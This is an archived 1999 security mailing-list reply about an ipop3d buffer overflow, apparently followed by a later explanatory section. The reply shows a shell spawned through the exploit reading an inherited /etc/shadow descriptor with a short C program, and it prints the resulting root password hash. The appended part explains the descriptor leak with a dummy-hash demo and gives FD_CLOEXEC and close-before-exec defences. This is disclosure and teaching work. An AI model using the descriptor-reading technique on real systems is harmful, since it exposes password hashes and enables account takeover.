Date: Thu, 8 Apr 1999 16:39:30 +0200
From: "M.C.Mar" <[email protected]>
To: [email protected]
Subject: Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Commander (x2)
On Tue, 6 Apr 1999, Stefan Rompf wrote:
> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> >Exploited overflow in ipop3d could be used to gain superuser access (the
> >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage:
>
> If the effective user ID of the process calling setuid() is
> the super-user, the real, effective, and saved user IDs are
> set to the uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.
>
But, (un)fortunately when exploiting ipop3d I found something like this:
Grabarz:~emsi# lsof -n | grep 1190
sh 1190 emsi cwd DIR 8,1 1024 2 /
sh 1190 emsi rtd DIR 8,1 1024 2 /
sh 1190 emsi txt REG 8,1 279352 16324 /bin/bash
sh 1190 emsi mem REG 8,1 78828 30629 /lib/ld-linux.so.1.9.5
sh 1190 emsi mem REG 8,1 11493 79564 /lib/libtermcap.so.2.0.8
sh 1190 emsi mem REG 8,1 605044 79566 /lib/libc.so.5.4.33
[...]
sh 1190 emsi 3r REG 8,1 598 24674 /etc/shadow
A shell spawned via ipop3d exploitation (no bonus -- no exploit core) inherits
the open fds :)
So we may do something like this:
emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to [email protected]) at Fri, 9 Apr 1999 15:19:33 +0000 ( )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=1002(emsi) gid=100(users) groups=100(users)
: command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
#include <stdio.h>
#include <unistd.h>
int main(void)
{
char buf[255];
lseek(3,0,0);                         /* rewind the inherited descriptor */
read(3,buf,255);                      /* buf is not NUL-terminated, hence the trailing garbage below */
printf("Be my guest:\n%s\n",buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$
./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
new¿¤þ^
`
bash$
bash$
That's only an example... It proves that exploiting ipop3d could be useful
to obtain root (or any other account) access and that the vulnerability
should be fixed.
P.S.
Greetings to Lam3rZ Group, 3Kombajd_do_czereśni testers and Lcamtuf (you lamer,
will you finally send me that txt you promised me? ;).
--
___________________________________________________________________________
M.C.Mar An NT server can be run by an idiot, and usually is. [email protected]
"If you can't make it good, make it LOOK good." - Bill Gates
Maybe this isn't the place, but M$ programs, for example, are veritable monuments to stupidity.
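The mechanism the post demonstrates with lsof and p.c is ordinary descriptor inheritance: setuid() changes credentials but leaves every open file in place, and exec() keeps every descriptor that is not marked close-on-exec. The program below is an added example, not code from the post or from ipop3d. It opens a constructed stand-in for /etc/shadow (an unlinked temp file with a dummy hash), spawns /bin/sh the way an exploited daemon would, and has the shell read the inherited descriptor by number, exactly as p.c does with fd 3; the function and file names are invented for the example, and it assumes /bin/sh exists. Mode 0 reproduces the leak, mode 1 marks the descriptor FD_CLOEXEC, and mode 2 closes everything above stderr in the child before exec.

```c
/* fdleak.c (added example): a child exec()ed from a process that still holds
 * an open file inherits that descriptor unless it was marked close-on-exec or
 * closed before the exec.  Mode 0 leaks it (the ipop3d situation), mode 1 sets
 * FD_CLOEXEC on it, mode 2 closes every fd above stderr before exec. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed stand-in for the root line of /etc/shadow; the hash is a dummy. */
static const char SHADOW_SAMPLE[] = "root:xxDUMMYHASHxx:10539:0:::::\n";

/* Create an unlinked temp file holding SHADOW_SAMPLE, rewound to offset 0,
 * and return its descriptor (or -1 on error). */
static int make_sample_file(void) {
    char path[] = "/tmp/shadow-sample-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    unlink(path);                               /* anonymous once we hold the fd */
    size_t len = sizeof SHADOW_SAMPLE - 1;
    if (write(fd, SHADOW_SAMPLE, len) != (ssize_t)len || lseek(fd, 0, SEEK_SET) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Close every descriptor above stderr.  Capped so a huge RLIMIT_NOFILE does
 * not stall the demo; real code would use close_range(2) or /proc/self/fd. */
static void close_fds_above_stderr(void) {
    long maxfd = sysconf(_SC_OPEN_MAX);
    if (maxfd < 0 || maxfd > 65536) maxfd = 65536;
    for (int fd = 3; fd < maxfd; fd++) close(fd);
}

/* Spawn /bin/sh while the sample file is open on some fd (it would be 3 in a
 * daemon that has only stdin/stdout/stderr open, as in the post).  The shell
 * is told the fd number and tries to read one line from it; whatever it gets
 * comes back through a pipe into 'out'.  Returns the number of bytes the
 * child obtained (0 = nothing leaked), or -1 on error. */
int bytes_leaked_to_child(int mode, char *out, size_t outlen) {
    int secret = make_sample_file();
    if (secret < 0) return -1;
    if (mode == 1 && fcntl(secret, F_SETFD, FD_CLOEXEC) < 0) { close(secret); return -1; }

    int pipefd[2];
    if (pipe(pipefd) < 0) { close(secret); return -1; }

    /* Same idea as p.c in the post: read the inherited fd by its number. */
    char cmd[128];
    snprintf(cmd, sizeof cmd, "read line <&%d && printf '%%s\\n' \"$line\"", secret);

    pid_t pid = fork();
    if (pid < 0) { close(secret); close(pipefd[0]); close(pipefd[1]); return -1; }
    if (pid == 0) {
        int devnull = open("/dev/null", O_WRONLY);
        if (devnull >= 0) { dup2(devnull, STDERR_FILENO); close(devnull); }  /* hide "bad fd" noise */
        dup2(pipefd[1], STDOUT_FILENO);
        close(pipefd[0]);
        close(pipefd[1]);
        if (mode == 2) close_fds_above_stderr();    /* 'secret' does not survive */
        execl("/bin/sh", "sh", "-c", cmd, (char *)0);
        _exit(127);
    }

    close(secret);                                  /* parent's copy only */
    close(pipefd[1]);
    size_t n = 0;
    for (;;) {
        ssize_t r = read(pipefd[0], out + n, outlen - 1 - n);
        if (r <= 0) break;
        n += (size_t)r;
        if (n >= outlen - 1) break;
    }
    out[n] = '\0';
    close(pipefd[0]);
    waitpid(pid, NULL, 0);
    return (int)n;
}

int main(void) {
    const char *names[] = { "leaked", "FD_CLOEXEC", "closed before exec" };
    char buf[256];
    for (int mode = 0; mode < 3; mode++) {
        int n = bytes_leaked_to_child(mode, buf, sizeof buf);
        printf("%-18s: child read %d bytes\n", names[mode], n);
        if (n > 0) fputs(buf, stdout);
    }
    return 0;
}
```

Mode 0 is what the post's lsof output shows: the dropped-privilege shell holds a descriptor that root opened, and the kernel never re-checks file permissions on an already open file. Setting FD_CLOEXEC (today, passing O_CLOEXEC to open() in the first place) stops the exec'ed shell from inheriting it; closing all descriptors above stderr before exec is the belt-and-braces version for daemons that cannot audit every open() they make. Neither replaces fixing the overflow, but both keep a successful exploit from walking away with files the daemon opened while it was still root.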